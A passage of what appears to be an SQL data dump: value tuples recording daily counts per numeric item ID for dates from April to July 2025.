(14,0,'20250423',7),
(459,0,'20250424',1),
(469,0,'20250424',1),
(680,0,'20250424',1),
(700,0,'20250424',1),
(703,0,'20250424',1),
(712,0,'20250424',1),
(716,0,'20250424',1),
(741,0,'20250424',1),
(748,0,'20250424',1),
(771,0,'20250424',1),
(776,0,'20250424',1),
(784,0,'20250424',1),
(810,0,'20250424',1),
(828,0,'20250424',1),
(831,0,'20250424',1),
(836,0,'20250424',1),
(840,0,'20250424',1),
(851,0,'20250424',1),
(855,0,'20250424',1),
(859,0,'20250424',1),
(900,0,'20250424',1),
(1003,0,'20250424',1),
(1010,0,'20250424',1),
(1016,0,'20250424',1),
(1020,0,'20250424',1),
(1032,0,'20250424',1),
(1036,0,'20250424',1),
(1052,0,'20250424',1),
(1059,0,'20250424',1),
(566,0,'20250424',2),
(708,0,'20250424',2),
(355,0,'20250424',4),
(14,0,'20250424',13),
(14,0,'20250425',1),
(1003,0,'20250425',1),
(1032,0,'20250425',1),
(542,0,'20250426',1),
(741,0,'20250426',1),
(748,0,'20250426',1),
(14,0,'20250426',40),
(476,0,'20250427',1),
(496,0,'20250427',1),
(609,0,'20250427',1),
(656,0,'20250427',1),
(810,0,'20250427',1),
(831,0,'20250427',1),
(871,0,'20250427',1),
(1003,0,'20250427',1),
(1010,0,'20250427',1),
(1016,0,'20250427',2),
(14,0,'20250427',76),
(355,0,'20250428',1),
(771,0,'20250428',1),
(14,0,'20250428',49),
(355,0,'20250429',1),
(362,0,'20250429',1),
(708,0,'20250429',1),
(828,0,'20250429',1),
(1052,0,'20250429',1),
(650,0,'20250429',2),
(643,0,'20250429',3),
(14,0,'20250429',103),
(459,0,'20250430',1),
(542,0,'20250430',1),
(566,0,'20250430',1),
(643,0,'20250430',1),
(703,0,'20250430',1),
(741,0,'20250430',1),
(748,0,'20250430',1),
(771,0,'20250430',1),
(776,0,'20250430',1),
(780,0,'20250430',1),
(784,0,'20250430',1),
(836,0,'20250430',1),
(840,0,'20250430',1),
(1003,0,'20250430',1),
(1016,0,'20250430',1),
(1032,0,'20250430',1),
(1052,0,'20250430',1),
(1059,0,'20250430',1),
(355,0,'20250430',2),
(362,0,'20250430',2),
(476,0,'20250430',2),
(484,0,'20250430',2),
(496,0,'20250430',2),
(506,0,'20250430',2),
(546,0,'20250430',2),
(563,0,'20250430',2),
(605,0,'20250430',2),
(656,0,'20250430',2),
(680,0,'20250430',2),
(700,0,'20250430',2),
(708,0,'20250430',2),
(712,0,'20250430',2),
(716,0,'20250430',2),
(810,0,'20250430',2),
(824,0,'20250430',2),
(828,0,'20250430',2),
(831,0,'20250430',2),
(851,0,'20250430',2),
(855,0,'20250430',2),
(871,0,'20250430',2),
(900,0,'20250430',2),
(1010,0,'20250430',2),
(1020,0,'20250430',2),
(1036,0,'20250430',2),
(469,0,'20250430',3),
(650,0,'20250430',3),
(859,0,'20250430',3),
(609,0,'20250430',7),
(14,0,'20250430',103),
(362,0,'20250501',1),
(605,0,'20250501',1),
(643,0,'20250501',1),
(851,0,'20250501',1),
(469,0,'20250501',2),
(355,0,'20250501',3),
(14,0,'20250501',53),
(362,0,'20250502',1),
(469,0,'20250502',1),
(605,0,'20250502',1),
(855,0,'20250502',1),
(355,0,'20250502',5),
(14,0,'20250502',48),
(484,0,'20250503',1),
(680,0,'20250503',1),
(708,0,'20250503',1),
(748,0,'20250503',1),
(1036,0,'20250503',1),
(355,0,'20250503',5),
(14,0,'20250503',68),
(355,0,'20250504',2),
(14,0,'20250504',12),
(836,0,'20250505',1),
(1032,0,'20250505',1),
(712,0,'20250505',2),
(355,0,'20250505',3),
(14,0,'20250505',9),
(643,0,'20250506',1),
(656,0,'20250506',1),
(900,0,'20250506',1),
(1020,0,'20250506',1),
(1059,0,'20250506',1),
(14,0,'20250506',8),
(355,0,'20250507',1),
(609,0,'20250507',1),
(824,0,'20250507',1),
(1052,0,'20250507',1),
(643,0,'20250507',10),
(14,0,'20250507',157),
(459,0,'20250508',1),
(703,0,'20250508',1),
(708,0,'20250508',1),
(771,0,'20250508',1),
(851,0,'20250508',1),
(362,0,'20250508',3),
(14,0,'20250508',13),
(506,0,'20250509',1),
(542,0,'20250509',1),
(605,0,'20250509',1),
(656,0,'20250509',1),
(700,0,'20250509',1),
(355,0,'20250509',2),
(469,0,'20250509',2),
(14,0,'20250509',8),
(546,0,'20250510',1),
(703,0,'20250510',1),
(840,0,'20250510',1),
(355,0,'20250510',2),
(643,0,'20250510',14),
(14,0,'20250510',78),
(469,0,'20250511',1),
(712,0,'20250511',1),
(14,0,'20250511',10),
(355,0,'20250512',1),
(566,0,'20250512',1),
(650,0,'20250512',1),
(716,0,'20250512',1),
(741,0,'20250512',1),
(14,0,'20250512',2),
(14,0,'20250513',1),
(362,0,'20250513',1),
(476,0,'20250513',1),
(563,0,'20250513',1),
(643,0,'20250513',1),
(748,0,'20250513',1),
(780,0,'20250513',1),
(859,0,'20250513',1),
(871,0,'20250513',1),
(542,0,'20250513',2),
(355,0,'20250514',1),
(469,0,'20250514',1),
(476,0,'20250514',1),
(484,0,'20250514',1),
(496,0,'20250514',1),
(605,0,'20250514',1),
(609,0,'20250514',1),
(563,0,'20250514',2),
(700,0,'20250514',2),
(14,0,'20250514',8),
(484,0,'20250515',1),
(496,0,'20250515',1),
(605,0,'20250515',1),
(643,0,'20250515',1),
(716,0,'20250515',1),
(810,0,'20250515',1),
(840,0,'20250515',1),
(859,0,'20250515',1),
(362,0,'20250515',3),
(14,0,'20250515',12),
(355,0,'20250516',1),
(469,0,'20250516',1),
(542,0,'20250516',1),
(546,0,'20250516',1),
(605,0,'20250516',1),
(643,0,'20250516',1),
(650,0,'20250516',1),
(680,0,'20250516',1),
(703,0,'20250516',1),
(771,0,'20250516',1),
(776,0,'20250516',1),
(780,0,'20250516',1),
(784,0,'20250516',1),
(824,0,'20250516',1),
(828,0,'20250516',1),
(840,0,'20250516',1),
(851,0,'20250516',1),
(855,0,'20250516',1),
(900,0,'20250516',1),
(1010,0,'20250516',1),
(1016,0,'20250516',1),
(1059,0,'20250516',1),
(362,0,'20250516',2),
(496,0,'20250516',2),
(1003,0,'20250516',2),
(871,0,'20250516',3),
(14,0,'20250516',6),
(355,0,'20250517',1),
(362,0,'20250517',1),
(484,0,'20250517',1),
(643,0,'20250517',1),
(776,0,'20250517',1),
(836,0,'20250517',1),
(871,0,'20250517',1),
(1003,0,'20250517',1),
(1010,0,'20250517',1),
(1016,0,'20250517',1),
(831,0,'20250517',2),
(476,0,'20250518',1),
(496,0,'20250518',1),
(609,0,'20250518',1),
(14,0,'20250518',6),
(355,0,'20250519',1),
(563,0,'20250519',1),
(828,0,'20250519',1),
(14,0,'20250519',3),
(566,0,'20250520',1),
(780,0,'20250520',1),
(810,0,'20250520',1),
(1052,0,'20250520',1),
(14,0,'20250520',2),
(459,0,'20250521',1),
(476,0,'20250521',1),
(496,0,'20250521',1),
(542,0,'20250521',1),
(563,0,'20250521',1),
(566,0,'20250521',1),
(605,0,'20250521',1),
(609,0,'20250521',1),
(643,0,'20250521',1),
(650,0,'20250521',1),
(656,0,'20250521',1),
(700,0,'20250521',1),
(741,0,'20250521',1),
(748,0,'20250521',1),
(776,0,'20250521',1),
(784,0,'20250521',1),
(810,0,'20250521',1),
(824,0,'20250521',1),
(828,0,'20250521',1),
(851,0,'20250521',1),
(900,0,'20250521',1),
(1010,0,'20250521',1),
(362,0,'20250521',2),
(469,0,'20250521',2),
(484,0,'20250521',2),
(546,0,'20250521',2),
(712,0,'20250521',2),
(859,0,'20250521',2),
(1003,0,'20250521',2),
(871,0,'20250521',3),
(355,0,'20250521',6),
(14,0,'20250521',9),
(459,0,'20250522',1),
(496,0,'20250522',1),
(546,0,'20250522',1),
(563,0,'20250522',1),
(566,0,'20250522',1),
(609,0,'20250522',1),
(643,0,'20250522',1),
(650,0,'20250522',1),
(656,0,'20250522',1),
(712,0,'20250522',1),
(810,0,'20250522',1),
(828,0,'20250522',1),
(855,0,'20250522',1),
(859,0,'20250522',1),
(871,0,'20250522',1),
(900,0,'20250522',1),
(1003,0,'20250522',1),
(1010,0,'20250522',1),
(355,0,'20250522',2),
(362,0,'20250522',2),
(469,0,'20250522',2),
(476,0,'20250522',2),
(484,0,'20250522',2),
(605,0,'20250522',2),
(700,0,'20250522',2),
(741,0,'20250522',2),
(748,0,'20250522',3),
(14,0,'20250522',8),
(362,0,'20250523',1),
(484,0,'20250523',1),
(542,0,'20250523',1),
(656,0,'20250523',1),
(680,0,'20250523',1),
(716,0,'20250523',1),
(748,0,'20250523',1),
(810,0,'20250523',1),
(1036,0,'20250523',1),
(546,0,'20250523',2),
(605,0,'20250523',2),
(14,0,'20250523',3),
(355,0,'20250524',1),
(1016,0,'20250524',1),
(14,0,'20250524',2),
(771,0,'20250525',1),
(836,0,'20250525',1),
(14,0,'20250525',5),
(362,0,'20250526',1),
(546,0,'20250526',1),
(609,0,'20250526',1),
(643,0,'20250526',1),
(712,0,'20250526',1),
(900,0,'20250526',1),
(1032,0,'20250526',1),
(1059,0,'20250526',1),
(14,0,'20250526',6),
(355,0,'20250527',1),
(650,0,'20250527',1),
(741,0,'20250527',1),
(900,0,'20250527',1),
(1020,0,'20250527',1),
(14,0,'20250527',4),
(355,0,'20250528',1),
(362,0,'20250528',1),
(459,0,'20250528',1),
(476,0,'20250528',1),
(484,0,'20250528',1),
(496,0,'20250528',1),
(506,0,'20250528',1),
(542,0,'20250528',1),
(546,0,'20250528',1),
(563,0,'20250528',1),
(566,0,'20250528',1),
(605,0,'20250528',1),
(609,0,'20250528',1),
(643,0,'20250528',1),
(650,0,'20250528',1),
(656,0,'20250528',1),
(700,0,'20250528',1),
(708,0,'20250528',1),
(712,0,'20250528',1),
(716,0,'20250528',1),
(741,0,'20250528',1),
(748,0,'20250528',1),
(776,0,'20250528',1),
(780,0,'20250528',1),
(784,0,'20250528',1),
(810,0,'20250528',1),
(824,0,'20250528',1),
(828,0,'20250528',1),
(831,0,'20250528',1),
(836,0,'20250528',1),
(851,0,'20250528',1),
(855,0,'20250528',1),
(859,0,'20250528',1),
(900,0,'20250528',1),
(1003,0,'20250528',1),
(1016,0,'20250528',1),
(1020,0,'20250528',1),
(1032,0,'20250528',1),
(1036,0,'20250528',1),
(1052,0,'20250528',1),
(1059,0,'20250528',1),
(469,0,'20250528',2),
(680,0,'20250528',2),
(703,0,'20250528',2),
(771,0,'20250528',2),
(840,0,'20250528',2),
(871,0,'20250528',2),
(14,0,'20250528',6),
(14,0,'20250529',1),
(459,0,'20250529',1),
(506,0,'20250529',1),
(656,0,'20250529',1),
(700,0,'20250529',1),
(708,0,'20250529',1),
(851,0,'20250529',1),
(1036,0,'20250529',1),
(1052,0,'20250529',1),
(355,0,'20250529',3),
(362,0,'20250530',1),
(469,0,'20250530',1),
(546,0,'20250530',1),
(609,0,'20250530',1),
(650,0,'20250530',1),
(703,0,'20250530',1),
(712,0,'20250530',1),
(776,0,'20250530',1),
(780,0,'20250530',1),
(784,0,'20250530',1),
(836,0,'20250530',1),
(840,0,'20250530',1),
(851,0,'20250530',1),
(855,0,'20250530',1),
(859,0,'20250530',1),
(871,0,'20250530',1),
(900,0,'20250530',1),
(1016,0,'20250530',1),
(1020,0,'20250530',1),
(1052,0,'20250530',1),
(14,0,'20250530',5),
(476,0,'20250531',1),
(605,0,'20250531',1),
(643,0,'20250531',1),
(680,0,'20250531',1),
(708,0,'20250531',1),
(771,0,'20250531',1),
(784,0,'20250531',1),
(828,0,'20250531',1),
(871,0,'20250531',1),
(1003,0,'20250531',1),
(1010,0,'20250531',1),
(1032,0,'20250531',1),
(1036,0,'20250531',1),
(1059,0,'20250531',1),
(546,0,'20250531',2),
(355,0,'20250531',3),
(14,0,'20250531',17),
(355,0,'20250601',1),
(506,0,'20250601',1),
(566,0,'20250601',1),
(741,0,'20250601',1),
(824,0,'20250601',1),
(831,0,'20250601',1),
(840,0,'20250601',1),
(855,0,'20250601',1),
(650,0,'20250601',2),
(700,0,'20250601',2),
(14,0,'20250601',19),
(563,0,'20250602',1),
(566,0,'20250602',1),
(605,0,'20250602',1),
(609,0,'20250602',1),
(656,0,'20250602',1),
(716,0,'20250602',1),
(748,0,'20250602',1),
(780,0,'20250602',1),
(1016,0,'20250602',1),
(362,0,'20250602',2),
(14,0,'20250602',6),
(459,0,'20250603',1),
(476,0,'20250603',1),
(496,0,'20250603',1),
(566,0,'20250603',1),
(609,0,'20250603',1),
(700,0,'20250603',1),
(712,0,'20250603',1),
(741,0,'20250603',1),
(828,0,'20250603',1),
(859,0,'20250603',1),
(1010,0,'20250603',1),
(1052,0,'20250603',1),
(871,0,'20250603',2),
(14,0,'20250603',4),
(14,0,'20250604',1),
(355,0,'20250604',1),
(828,0,'20250604',1),
(859,0,'20250604',1),
(355,0,'20250605',1),
(362,0,'20250605',1),
(469,0,'20250605',1),
(484,0,'20250605',1),
(609,0,'20250605',1),
(1020,0,'20250605',1),
(605,0,'20250605',2),
(14,0,'20250605',7),
(355,0,'20250606',1),
(362,0,'20250606',1),
(459,0,'20250606',1),
(643,0,'20250606',1),
(700,0,'20250606',1),
(712,0,'20250606',1),
(741,0,'20250606',1),
(828,0,'20250606',1),
(831,0,'20250606',1),
(1003,0,'20250606',1),
(469,0,'20250606',2),
(506,0,'20250606',2),
(546,0,'20250606',2),
(566,0,'20250606',2),
(859,0,'20250606',2),
(900,0,'20250606',2),
(1010,0,'20250606',4),
(14,0,'20250606',5),
(476,0,'20250606',6),
(871,0,'20250606',6),
(355,0,'20250607',1),
(476,0,'20250607',1),
(609,0,'20250607',1),
(712,0,'20250607',1),
(741,0,'20250607',1),
(776,0,'20250607',1),
(828,0,'20250607',1),
(831,0,'20250607',1),
(871,0,'20250607',1),
(1016,0,'20250607',1),
(14,0,'20250607',3),
(650,0,'20250607',3),
(496,0,'20250607',5),
(459,0,'20250608',1),
(476,0,'20250608',1),
(566,0,'20250608',1),
(609,0,'20250608',1),
(656,0,'20250608',1),
(810,0,'20250608',1),
(828,0,'20250608',1),
(871,0,'20250608',1),
(1010,0,'20250608',1),
(14,0,'20250608',5),
(476,0,'20250609',1),
(484,0,'20250609',1),
(700,0,'20250609',1),
(780,0,'20250609',1),
(810,0,'20250609',1),
(859,0,'20250609',1),
(1052,0,'20250609',1),
(643,0,'20250609',2),
(871,0,'20250609',2),
(362,0,'20250609',3),
(14,0,'20250609',6),
(362,0,'20250610',1),
(459,0,'20250610',1),
(476,0,'20250610',1),
(484,0,'20250610',1),
(496,0,'20250610',1),
(506,0,'20250610',1),
(542,0,'20250610',1),
(566,0,'20250610',1),
(609,0,'20250610',1),
(650,0,'20250610',1),
(656,0,'20250610',1),
(700,0,'20250610',1),
(703,0,'20250610',1),
(716,0,'20250610',1),
(741,0,'20250610',1),
(748,0,'20250610',1),
(784,0,'20250610',1),
(810,0,'20250610',1),
(828,0,'20250610',1),
(840,0,'20250610',1),
(1032,0,'20250610',1),
(1059,0,'20250610',1),
(355,0,'20250610',2),
(469,0,'20250610',2),
(546,0,'20250610',2),
(563,0,'20250610',2),
(605,0,'20250610',2),
(643,0,'20250610',2),
(680,0,'20250610',2),
(708,0,'20250610',2),
(712,0,'20250610',2),
(776,0,'20250610',2),
(780,0,'20250610',2),
(831,0,'20250610',2),
(836,0,'20250610',2),
(851,0,'20250610',2),
(855,0,'20250610',2),
(859,0,'20250610',2),
(900,0,'20250610',2),
(1003,0,'20250610',2),
(1010,0,'20250610',2),
(1016,0,'20250610',2),
(1020,0,'20250610',2),
(1036,0,'20250610',2),
(1052,0,'20250610',2),
(824,0,'20250610',3),
(871,0,'20250610',3),
(14,0,'20250610',4),
(469,0,'20250611',1),
(542,0,'20250611',1),
(566,0,'20250611',1),
(643,0,'20250611',1),
(650,0,'20250611',1),
(656,0,'20250611',1),
(703,0,'20250611',1),
(712,0,'20250611',1),
(716,0,'20250611',1),
(776,0,'20250611',1),
(784,0,'20250611',1),
(828,0,'20250611',1),
(840,0,'20250611',1),
(859,0,'20250611',1),
(476,0,'20250611',2),
(14,0,'20250611',3),
(362,0,'20250612',1),
(484,0,'20250612',1),
(506,0,'20250612',1),
(542,0,'20250612',1),
(566,0,'20250612',1),
(605,0,'20250612',1),
(643,0,'20250612',1),
(741,0,'20250612',1),
(855,0,'20250612',1),
(871,0,'20250612',1),
(1036,0,'20250612',1),
(476,0,'20250612',2),
(14,0,'20250612',3),
(355,0,'20250613',1),
(362,0,'20250613',1),
(459,0,'20250613',1),
(469,0,'20250613',1),
(496,0,'20250613',1),
(546,0,'20250613',1),
(605,0,'20250613',1),
(609,0,'20250613',1),
(643,0,'20250613',1),
(656,0,'20250613',1),
(680,0,'20250613',1),
(700,0,'20250613',1),
(712,0,'20250613',1),
(741,0,'20250613',1),
(748,0,'20250613',1),
(776,0,'20250613',1),
(810,0,'20250613',1),
(828,0,'20250613',1),
(836,0,'20250613',1),
(859,0,'20250613',1),
(871,0,'20250613',1),
(900,0,'20250613',1),
(1003,0,'20250613',1),
(1010,0,'20250613',1),
(476,0,'20250613',2),
(484,0,'20250613',2),
(563,0,'20250613',2),
(566,0,'20250613',2),
(650,0,'20250613',2),
(14,0,'20250613',7),
(469,0,'20250614',1),
(484,0,'20250614',1),
(609,0,'20250614',1),
(643,0,'20250614',1),
(700,0,'20250614',1),
(703,0,'20250614',1),
(748,0,'20250614',1),
(900,0,'20250614',1),
(1010,0,'20250614',1),
(871,0,'20250614',2),
(1059,0,'20250614',2),
(14,0,'20250614',5),
(476,0,'20250615',1),
(836,0,'20250615',1),
(900,0,'20250615',1),
(1032,0,'20250615',1),
(871,0,'20250615',2),
(14,0,'20250615',4),
(484,0,'20250616',1),
(496,0,'20250616',1),
(563,0,'20250616',1),
(609,0,'20250616',1),
(650,0,'20250616',1),
(656,0,'20250616',1),
(708,0,'20250616',1),
(741,0,'20250616',1),
(748,0,'20250616',1),
(776,0,'20250616',1),
(810,0,'20250616',1),
(828,0,'20250616',1),
(900,0,'20250616',1),
(1003,0,'20250616',1),
(1059,0,'20250616',1),
(362,0,'20250616',2),
(469,0,'20250616',2),
(476,0,'20250616',2),
(546,0,'20250616',2),
(566,0,'20250616',2),
(605,0,'20250616',2),
(643,0,'20250616',2),
(700,0,'20250616',2),
(712,0,'20250616',2),
(859,0,'20250616',2),
(1010,0,'20250616',2),
(355,0,'20250616',3),
(459,0,'20250616',3),
(871,0,'20250616',3),
(1020,0,'20250616',4),
(14,0,'20250616',11),
(355,0,'20250617',1),
(362,0,'20250617',1),
(700,0,'20250617',1),
(771,0,'20250617',1),
(828,0,'20250617',1),
(859,0,'20250617',1),
(1003,0,'20250617',1),
(1010,0,'20250617',1),
(476,0,'20250617',2),
(650,0,'20250617',3),
(871,0,'20250617',3),
(14,0,'20250617',6),
(459,0,'20250618',1),
(656,0,'20250618',1),
(700,0,'20250618',1),
(703,0,'20250618',1),
(708,0,'20250618',1),
(748,0,'20250618',1),
(1010,0,'20250618',1),
(14,0,'20250618',2),
(506,0,'20250618',2),
(546,0,'20250618',2),
(871,0,'20250618',2),
(362,0,'20250618',3),
(605,0,'20250618',3),
(741,0,'20250618',3),
(459,0,'20250619',1),
(469,0,'20250619',1),
(476,0,'20250619',1),
(605,0,'20250619',1),
(741,0,'20250619',1),
(840,0,'20250619',1),
(871,0,'20250619',1),
(1059,0,'20250619',1),
(546,0,'20250619',2),
(14,0,'20250619',9),
(355,0,'20250620',1),
(362,0,'20250620',1),
(459,0,'20250620',1),
(469,0,'20250620',1),
(476,0,'20250620',1),
(484,0,'20250620',1),
(563,0,'20250620',1),
(605,0,'20250620',1),
(643,0,'20250620',1),
(741,0,'20250620',1),
(1016,0,'20250620',1),
(871,0,'20250620',3),
(14,0,'20250620',8),
(469,0,'20250621',1),
(476,0,'20250621',1),
(650,0,'20250621',1),
(680,0,'20250621',1),
(741,0,'20250621',1),
(810,0,'20250621',1),
(900,0,'20250621',1),
(566,0,'20250621',2),
(871,0,'20250621',2),
(355,0,'20250621',3),
(14,0,'20250621',6),
(563,0,'20250622',1),
(566,0,'20250622',1),
(716,0,'20250622',1),
(748,0,'20250622',1),
(780,0,'20250622',1),
(828,0,'20250622',1),
(476,0,'20250622',2),
(871,0,'20250622',2),
(355,0,'20250622',4),
(14,0,'20250622',15),
(476,0,'20250623',1),
(546,0,'20250623',1),
(828,0,'20250623',1),
(871,0,'20250623',2),
(14,0,'20250623',5),
(362,0,'20250624',1),
(469,0,'20250624',1),
(476,0,'20250624',1),
(484,0,'20250624',1),
(506,0,'20250624',1),
(542,0,'20250624',1),
(546,0,'20250624',1),
(563,0,'20250624',1),
(566,0,'20250624',1),
(609,0,'20250624',1),
(643,0,'20250624',1),
(650,0,'20250624',1),
(656,0,'20250624',1),
(680,0,'20250624',1),
(703,0,'20250624',1),
(708,0,'20250624',1),
(712,0,'20250624',1),
(716,0,'20250624',1),
(748,0,'20250624',1),
(771,0,'20250624',1),
(776,0,'20250624',1),
(780,0,'20250624',1),
(784,0,'20250624',1),
(810,0,'20250624',1),
(824,0,'20250624',1),
(828,0,'20250624',1),
(831,0,'20250624',1),
(836,0,'20250624',1),
(840,0,'20250624',1),
(851,0,'20250624',1),
(855,0,'20250624',1),
(859,0,'20250624',1),
(1010,0,'20250624',1),
(1016,0,'20250624',1),
(1020,0,'20250624',1),
(1032,0,'20250624',1),
(1036,0,'20250624',1),
(1052,0,'20250624',1),
(1059,0,'20250624',1),
(355,0,'20250624',2),
(459,0,'20250624',2),
(496,0,'20250624',2),
(700,0,'20250624',2),
(741,0,'20250624',2),
(871,0,'20250624',2),
(1003,0,'20250624',2),
(605,0,'20250624',3),
(900,0,'20250624',4),
(14,0,'20250624',11),
(484,0,'20250625',1),
(496,0,'20250625',1),
(563,0,'20250625',1),
(605,0,'20250625',1),
(643,0,'20250625',1),
(700,0,'20250625',1),
(900,0,'20250625',1),
(355,0,'20250625',2),
(609,0,'20250625',2),
(476,0,'20250625',3),
(14,0,'20250625',4),
(469,0,'20250626',1),
(542,0,'20250626',1),
(563,0,'20250626',1),
(680,0,'20250626',1),
(716,0,'20250626',1),
(871,0,'20250626',1),
(14,0,'20250626',3),
(459,0,'20250627',1),
(484,0,'20250627',1),
(563,0,'20250627',1),
(605,0,'20250627',1),
(643,0,'20250627',1),
(650,0,'20250627',1),
(656,0,'20250627',1),
(700,0,'20250627',1),
(741,0,'20250627',1),
(748,0,'20250627',1),
(810,0,'20250627',1),
(831,0,'20250627',1),
(859,0,'20250627',1),
(1003,0,'20250627',1),
(1016,0,'20250627',1),
(355,0,'20250627',2),
(469,0,'20250627',2),
(496,0,'20250627',2),
(546,0,'20250627',2),
(566,0,'20250627',2),
(609,0,'20250627',2),
(828,0,'20250627',2),
(900,0,'20250627',2),
(1010,0,'20250627',2),
(476,0,'20250627',3),
(712,0,'20250627',3),
(784,0,'20250627',3),
(871,0,'20250627',4),
(362,0,'20250627',5),
(1032,0,'20250627',5),
(14,0,'20250627',24),
(355,0,'20250628',1),
(362,0,'20250628',1),
(459,0,'20250628',1),
(469,0,'20250628',1),
(476,0,'20250628',1),
(484,0,'20250628',1),
(496,0,'20250628',1),
(506,0,'20250628',1),
(542,0,'20250628',1),
(546,0,'20250628',1),
(563,0,'20250628',1),
(566,0,'20250628',1),
(605,0,'20250628',1),
(609,0,'20250628',1),
(650,0,'20250628',1),
(656,0,'20250628',1),
(680,0,'20250628',1),
(700,0,'20250628',1),
(703,0,'20250628',1),
(708,0,'20250628',1),
(712,0,'20250628',1),
(716,0,'20250628',1),
(741,0,'20250628',1),
(748,0,'20250628',1),
(771,0,'20250628',1),
(776,0,'20250628',1),
(780,0,'20250628',1),
(784,0,'20250628',1),
(810,0,'20250628',1),
(824,0,'20250628',1),
(831,0,'20250628',1),
(836,0,'20250628',1),
(840,0,'20250628',1),
(851,0,'20250628',1),
(855,0,'20250628',1),
(900,0,'20250628',1),
(1016,0,'20250628',1),
(1020,0,'20250628',1),
(1032,0,'20250628',1),
(1052,0,'20250628',1),
(1059,0,'20250628',1),
(643,0,'20250628',2),
(859,0,'20250628',2),
(871,0,'20250628',2),
(1003,0,'20250628',2),
(1010,0,'20250628',2),
(1036,0,'20250628',2),
(828,0,'20250628',3),
(14,0,'20250628',27),
(355,0,'20250629',1),
(362,0,'20250629',1),
(459,0,'20250629',1),
(476,0,'20250629',1),
(484,0,'20250629',1),
(496,0,'20250629',1),
(546,0,'20250629',1),
(563,0,'20250629',1),
(566,0,'20250629',1),
(605,0,'20250629',1),
(609,0,'20250629',1),
(650,0,'20250629',1),
(656,0,'20250629',1),
(700,0,'20250629',1),
(712,0,'20250629',1),
(741,0,'20250629',1),
(748,0,'20250629',1),
(784,0,'20250629',1),
(810,0,'20250629',1),
(851,0,'20250629',1),
(871,0,'20250629',1),
(1003,0,'20250629',1),
(1010,0,'20250629',1),
(1052,0,'20250629',1),
(469,0,'20250629',2),
(828,0,'20250629',2),
(859,0,'20250629',2),
(900,0,'20250629',2),
(643,0,'20250629',3),
(14,0,'20250629',48),
(459,0,'20250630',1),
(476,0,'20250630',1),
(484,0,'20250630',1),
(496,0,'20250630',1),
(546,0,'20250630',1),
(563,0,'20250630',1),
(566,0,'20250630',1),
(605,0,'20250630',1),
(650,0,'20250630',1),
(656,0,'20250630',1),
(700,0,'20250630',1),
(712,0,'20250630',1),
(748,0,'20250630',1),
(784,0,'20250630',1),
(824,0,'20250630',1),
(859,0,'20250630',1),
(871,0,'20250630',1),
(1010,0,'20250630',1),
(1016,0,'20250630',1),
(609,0,'20250630',2),
(741,0,'20250630',2),
(810,0,'20250630',2),
(828,0,'20250630',2),
(1003,0,'20250630',2),
(1032,0,'20250630',2),
(469,0,'20250630',3),
(355,0,'20250630',5),
(14,0,'20250630',14),
(484,0,'20250701',1),
(542,0,'20250701',1),
(605,0,'20250701',1),
(643,0,'20250701',1),
(650,0,'20250701',1),
(712,0,'20250701',1),
(776,0,'20250701',1),
(824,0,'20250701',1),
(851,0,'20250701',1),
(900,0,'20250701',1),
(1010,0,'20250701',1),
(1016,0,'20250701',1),
(1502,0,'20250701',1),
(1523,0,'20250701',1),
(1571,0,'20250701',1),
(546,0,'20250701',2),
(566,0,'20250701',2),
(784,0,'20250701',2),
(871,0,'20250701',2),
(1032,0,'20250701',2),
(1540,0,'20250701',2),
(355,0,'20250701',3),
(476,0,'20250701',3),
(1020,0,'20250701',3),
(1558,0,'20250701',3),
(14,0,'20250701',8),
(362,0,'20250702',1),
(459,0,'20250702',1),
(484,0,'20250702',1),
(563,0,'20250702',1),
(605,0,'20250702',1),
(741,0,'20250702',1),
(780,0,'20250702',1),
(784,0,'20250702',1),
(840,0,'20250702',1),
(855,0,'20250702',1),
(1020,0,'20250702',1),
(1052,0,'20250702',1),
(1523,0,'20250702',1),
(1540,0,'20250702',1),
(1571,0,'20250702',1),
(476,0,'20250702',2),
(836,0,'20250702',2),
(1594,0,'20250702',2),
(355,0,'20250702',11),
(14,0,'20250702',14),
(459,0,'20250703',1),
(469,0,'20250703',1),
(476,0,'20250703',1),
(563,0,'20250703',1),
(650,0,'20250703',1),
(700,0,'20250703',1),
(780,0,'20250703',1),
(1036,0,'20250703',1),
(1052,0,'20250703',1),
(1571,0,'20250703',1),
(1611,0,'20250703',1),
(1637,0,'20250703',1),
(484,0,'20250703',2),
(1623,0,'20250703',2),
(605,0,'20250703',5),
(355,0,'20250703',6),
(14,0,'20250703',7),
(459,0,'20250704',1),
(469,0,'20250704',1),
(563,0,'20250704',1),
(609,0,'20250704',1),
(656,0,'20250704',1),
(780,0,'20250704',1),
(784,0,'20250704',1),
(855,0,'20250704',1),
(871,0,'20250704',1),
(1523,0,'20250704',1),
(1676,0,'20250704',1),
(355,0,'20250704',2),
(1623,0,'20250704',2),
(1684,0,'20250704',2),
(14,0,'20250704',31),
(355,0,'20250705',1),
(362,0,'20250705',1),
(469,0,'20250705',1),
(476,0,'20250705',1),
(484,0,'20250705',1),
(496,0,'20250705',1),
(506,0,'20250705',1),
(542,0,'20250705',1),
(546,0,'20250705',1),
(563,0,'20250705',1),
(609,0,'20250705',1),
(643,0,'20250705',1),
(650,0,'20250705',1),
(656,0,'20250705',1),
(680,0,'20250705',1),
(700,0,'20250705',1),
(708,0,'20250705',1),
(712,0,'20250705',1),
(716,0,'20250705',1),
(741,0,'20250705',1),
(748,0,'20250705',1),
(776,0,'20250705',1),
(780,0,'20250705',1),
(824,0,'20250705',1),
(831,0,'20250705',1),
(840,0,'20250705',1),
(851,0,'20250705',1),
(855,0,'20250705',1),
(1003,0,'20250705',1),
(1016,0,'20250705',1),
(1020,0,'20250705',1),
(1036,0,'20250705',1),
(1052,0,'20250705',1),
(1059,0,'20250705',1),
(1684,0,'20250705',1),
(1697,0,'20250705',1),
(1704,0,'20250705',1),
(459,0,'20250705',2),
(566,0,'20250705',2),
(771,0,'20250705',2),
(784,0,'20250705',2),
(810,0,'20250705',2),
(828,0,'20250705',2),
(836,0,'20250705',2),
(859,0,'20250705',2),
(871,0,'20250705',2),
(900,0,'20250705',2),
(1010,0,'20250705',2),
(605,0,'20250705',3),
(703,0,'20250705',3),
(1032,0,'20250705',3),
(14,0,'20250705',8),
(496,0,'20250706',1),
(542,0,'20250706',1),
(546,0,'20250706',1),
(605,0,'20250706',1),
(643,0,'20250706',1),
(680,0,'20250706',1),
(771,0,'20250706',1),
(824,0,'20250706',1),
(840,0,'20250706',1),
(1020,0,'20250706',1),
(1052,0,'20250706',1),
(1059,0,'20250706',1),
(1523,0,'20250706',1),
(1611,0,'20250706',1),
(1623,0,'20250706',1),
(355,0,'20250706',2),
(1502,0,'20250706',2),
(1540,0,'20250706',2),
(1558,0,'20250706',2),
(1697,0,'20250706',2),
(1704,0,'20250706',2),
